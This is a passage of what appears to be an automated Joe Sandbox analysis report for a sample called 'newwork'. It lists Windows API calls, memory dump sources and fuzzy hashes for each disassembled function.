                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                        • String ID:
                                                                                        • API String ID: 296031713-0
                                                                                        • Opcode ID: ab3545b22e3440e815b1719652ff5d854977479bd1b850cbba673e5eb4522dee
                                                                                        • Instruction ID: 30adadd309813d1a6846ca6b4958dbaac508113c784b73a5bb8d11bfdb372a30
                                                                                        • Opcode Fuzzy Hash: ab3545b22e3440e815b1719652ff5d854977479bd1b850cbba673e5eb4522dee
                                                                                        • Instruction Fuzzy Hash: 3941E3B2E00304DFDB10CF69EE8521A77A4F7A8324B15417FD854A77E2D3789801DB88
                                                                                        APIs
                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DF6C
                                                                                        • RegCloseKey.ADVAPI32(?,0042DFDD,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DFD0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseEnum
                                                                                        • String ID:
                                                                                        • API String ID: 2818636725-0
                                                                                        • Opcode ID: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
                                                                                        • Instruction ID: d62689c7b7995b9893119ef97773413105dd68debc8ff02f2d4f9d8a28cc91ff
                                                                                        • Opcode Fuzzy Hash: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
                                                                                        • Instruction Fuzzy Hash: DD31B270F04258AEDB11DFA6DD42BAEBBB9EB49304F91407BE501E6280D6785E01CA2D
                                                                                        APIs
                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 0045283C
                                                                                        • GetLastError.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 00452844
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 2919029540-0
                                                                                        • Opcode ID: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                                        • Instruction ID: fcc055d8c1a696a2a0db1e32a085008d871673fec5534948229a16d4440eefa6
                                                                                        • Opcode Fuzzy Hash: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                                        • Instruction Fuzzy Hash: A2113C72600208AF8B40DEA9DD41D9F77ECEB4E310B114567FD18D3241D678EE148B68
                                                                                        APIs
                                                                                        • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040ADF2
                                                                                        • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040AF4F,00000000,0040AF67,?,?,?,00000000), ref: 0040AE03
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Resource$FindFree
                                                                                        • String ID:
                                                                                        • API String ID: 4097029671-0
                                                                                        • Opcode ID: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
                                                                                        • Instruction ID: 3d7a77417cef7b3885e8747e4544195f2de945da78ee84bb1155330bb8f828e3
                                                                                        • Opcode Fuzzy Hash: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
                                                                                        • Instruction Fuzzy Hash: 0301F771300700AFD700FF69EC52E1B77EDDB46714710807AF500AB3D1D639AC10966A
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                        • EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$CurrentEnumWindows
                                                                                        • String ID:
                                                                                        • API String ID: 2396873506-0
                                                                                        • Opcode ID: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
                                                                                        • Instruction ID: bcaa23655132f8f2785c0a842f21b48ac99b37e3223c43442b01e3940dbd0cdf
                                                                                        • Opcode Fuzzy Hash: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
                                                                                        • Instruction Fuzzy Hash: 31015B76A04604BFD706CF6BEC1199ABBE8E789720B22887BEC04D3690E7355C10DF18
                                                                                        APIs
                                                                                        • MoveFileA.KERNEL32(00000000,00000000), ref: 00452CC2
                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,00452CE8), ref: 00452CCA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastMove
                                                                                        • String ID:
                                                                                        • API String ID: 55378915-0
                                                                                        • Opcode ID: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                                                        • Instruction ID: 1f9035ddd188b097fe3d15476f32cd7793c58c8f4df07880d9fc6ba60e4ff235
                                                                                        • Opcode Fuzzy Hash: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                                                        • Instruction Fuzzy Hash: 9401D671A04208AB8712EB799D4149EB7ECEB8A32575045BBFC04E3243EA785E048558
                                                                                        APIs
                                                                                        • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527A9
                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527B1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 1375471231-0
                                                                                        • Opcode ID: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
                                                                                        • Instruction ID: e3b373b60118a844676bb749001e6832c3b26a50706decb61b3ae2e0e224b701
                                                                                        • Opcode Fuzzy Hash: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
                                                                                        • Instruction Fuzzy Hash: 40F02871A00308BBCB01EF759D4259EB7E8EB4E311B2045B7FC04E3642E6B94E04859C
                                                                                        APIs
                                                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 00423249
                                                                                        • LoadCursorA.USER32(00000000,00000000), ref: 00423273
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CursorLoad
                                                                                        • String ID:
                                                                                        • API String ID: 3238433803-0
                                                                                        • Opcode ID: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
                                                                                        • Instruction ID: 5e34cf6406f075c2c63d733b1f02ef4b9a88184ee1572dc0f3c8875cc615d59b
                                                                                        • Opcode Fuzzy Hash: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
                                                                                        • Instruction Fuzzy Hash: 9EF0A711B04254AADA109E7E6CC0D6B72A8DF82735B61037BFA3EC72D1C62E1D414569
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                        • LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLibraryLoadMode
                                                                                        • String ID:
                                                                                        • API String ID: 2987862817-0
                                                                                        • Opcode ID: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
                                                                                        • Instruction ID: 14c2566281f292fbf4bc3f3871eddb8f7eb4f11f4d1149329263d7d1c8790498
                                                                                        • Opcode Fuzzy Hash: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
                                                                                        • Instruction Fuzzy Hash: 02F08970B147447FDB119F779CA241BBBECDB49B1175249B6F800A3591E53C4910C928
                                                                                        APIs
                                                                                        • SHGetKnownFolderPath.SHELL32(00499D40,00008000,00000000,?), ref: 0047C89B
                                                                                        • CoTaskMemFree.OLE32(?,0047C8DE), ref: 0047C8D1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: FolderFreeKnownPathTask
                                                                                        • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                        • API String ID: 969438705-544719455
                                                                                        • Opcode ID: c380859d91d2530b1710b7ab5da91f48806622674321ef44444f1ad2bc0d7433
                                                                                        • Instruction ID: f48ec61de784b6bea0373c7a91bc006da4a0813e938d35ae17fa89473a65de5f
                                                                                        • Opcode Fuzzy Hash: c380859d91d2530b1710b7ab5da91f48806622674321ef44444f1ad2bc0d7433
                                                                                        • Instruction Fuzzy Hash: 22E09230340604BFEB15EB61DC92F6977A8EB48B01B72847BF504E2680D67CAD00DB1C
                                                                                        APIs
                                                                                        • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 0045090E
                                                                                        • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 00450916
                                                                                          • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$FilePointer
                                                                                        • String ID:
                                                                                        • API String ID: 1156039329-0
                                                                                        • Opcode ID: ec46a7bc9e5a7a34518fa7989fb6988307d7ef9dfce9dbcd61575ad1106d4b51
                                                                                        • Instruction ID: 32d43412562f4d6ab64aa8be608e77008e370c57458e4df53f7444e76f76d0cb
                                                                                        • Opcode Fuzzy Hash: ec46a7bc9e5a7a34518fa7989fb6988307d7ef9dfce9dbcd61575ad1106d4b51
                                                                                        • Instruction Fuzzy Hash: 0EE012E93042015BF700EA6599C1B2F22DCDB44315F00446ABD44CA28BE678CC048B29
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual$AllocFree
                                                                                        • String ID:
                                                                                        • API String ID: 2087232378-0
                                                                                        • Opcode ID: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                                        • Instruction ID: 119661fe7174a079321c86e78af40791ac039b5eb8373b45468023a5ba433726
                                                                                        • Opcode Fuzzy Hash: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                                        • Instruction Fuzzy Hash: F7F08272A0063067EB60596A4C81B5359859BC5B94F154076FD09FF3E9D6B58C0142A9
                                                                                        APIs
                                                                                        • GetSystemDefaultLCID.KERNEL32(00000000,00408712), ref: 004085FB
                                                                                          • Part of subcall function 00406DEC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E09
                                                                                          • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                        • String ID:
                                                                                        • API String ID: 1658689577-0
                                                                                        • Opcode ID: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
                                                                                        • Instruction ID: 9026c6f0acc6bf601755118861b832b1e3c4c92574a9a05948c89544872af2a3
                                                                                        • Opcode Fuzzy Hash: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
                                                                                        • Instruction Fuzzy Hash: 47314E35E00109ABCB00EB55CC819EEB779EF84314F558577E815BB286EB38AA018B98
                                                                                        APIs
                                                                                        • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC39
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoScroll
                                                                                        • String ID:
                                                                                        • API String ID: 629608716-0
                                                                                        • Opcode ID: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
                                                                                        • Instruction ID: 6365c2cd079840e4170b7c9ce409c3d873e807bce8729d2e10e5c00059922083
                                                                                        • Opcode Fuzzy Hash: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
                                                                                        • Instruction Fuzzy Hash: D8214FB1608746AFC351DF3984407A6BBE4BB48344F14893EE498C3741E778E99ACBD6
                                                                                        APIs
                                                                                          • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                          • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                        • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C4AE,?,00000000,?,?,0046C6C0,?,00000000,0046C734), ref: 0046C492
                                                                                          • Part of subcall function 0041EF58: IsWindow.USER32(?), ref: 0041EF66
                                                                                          • Part of subcall function 0041EF58: EnableWindow.USER32(?,00000001), ref: 0041EF75
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ThreadWindow$CurrentEnableEnumPathPrepareWindowsWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3319771486-0
                                                                                        • Opcode ID: 0af19ab3550c8734ef4e1cf2f84aef4c41dad365f35295dd8d2c2646a272cfa9
                                                                                        • Instruction ID: eef1953176fed27c4f60a3b97998f4e8fb1447464a393d6256780c84e8a913cd
                                                                                        • Opcode Fuzzy Hash: 0af19ab3550c8734ef4e1cf2f84aef4c41dad365f35295dd8d2c2646a272cfa9
                                                                                        • Instruction Fuzzy Hash: 5AF0B471248300BFE705DF62ECA6B35B6E8D748714F61047BF40886590E97D5844D51E
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3934441357-0
                                                                                        • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                        • Instruction ID: 51b66c86ab1fb2ed9abdb0db83839a26410808368eb32e0cb4295e2ee82716ff
                                                                                        • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                        • Instruction Fuzzy Hash: 09F04970608109EBBB1CCF58D0618AF7BA0EB48300F2080AFE907C7BA0D634AA80D658
                                                                                        APIs
                                                                                        • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416585
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateWindow
                                                                                        • String ID:
                                                                                        • API String ID: 716092398-0
                                                                                        • Opcode ID: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                                        • Instruction ID: 158b8484bb218b41c698b3aa21f26e2dd86497bc01e640ef524e7c8f4c0ee3c6
                                                                                        • Opcode Fuzzy Hash: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                                        • Instruction Fuzzy Hash: 4BF019B2200510AFDB84DE9CD9C0F9773ECEB0C210B0481A6FA08CB21AD220EC108BB0
                                                                                        APIs
                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149EF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
